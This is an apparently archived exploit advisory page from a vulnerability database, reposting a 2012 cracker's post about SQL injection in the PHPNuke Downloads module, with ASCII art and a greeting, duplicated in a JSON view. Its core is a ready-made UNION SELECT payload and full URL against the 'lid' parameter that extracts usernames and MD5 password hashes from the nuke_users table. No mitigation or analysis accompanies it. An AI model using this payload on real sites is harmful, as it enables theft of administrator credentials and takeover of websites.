Lucene search

SecurityvulnsSECURITYVULNS:DOC:27979

HistoryApr 23, 2012 - 12:00 a.m.

PHPNuke Module's Name Download SQL Injection Vulnerabilities

2012-04-2300:00:00

vulners.com

##################################################################
##################################################################

_ _ _

.-" "-.

/ \

| |

|, .-. .-. ,|

| )(o/ \o)( |

|/ /\ \|

(@_ (_ ^^ _)

_ ) \\|IIIIII|/________________________

(_)@8@8{}<|-\IIIIII/-|________________________>

)_/ \ /

(@

±±±±±±±±±±+

–+CrAzY CrAcKeR±-

±±±±±±±±±±+

##################################################################
##################################################################

Example:-

[-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)

[-] Injection code… ( -1+union+select+username,1,user_password,user_id+from+nuke_users )

[-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users

[-] you see now password (md5) and the name of the site manager

####################################################################

Greeting to my friend A7eb Alwrd

####################################################################

JSON

PHPNuke Module&#39;s Name Download SQL Injection Vulnerabilities

_ _ _

.-" "-.

/ \

| |

|, .-. .-. ,|

| )(o/ \o)( |

|/ /\ \|

(@_ (_ ^^ _)

_ ) \\|IIIIII|/________________________

(_)@8@8{}<|-\IIIIII/-|________________________>

)_/ \ /

(@

±±±±±±±±±±+

–+CrAzY CrAcKeR±-

±±±±±±±±±±+

Example:-

[-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)

[-] Injection code… ( -1+union+select+username,1,user_password,user_id+from+nuke_users )

[-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users

[-] you see now password (md5) and the name of the site manager

Greeting to my friend A7eb Alwrd

PHPNuke Module's Name Download SQL Injection Vulnerabilities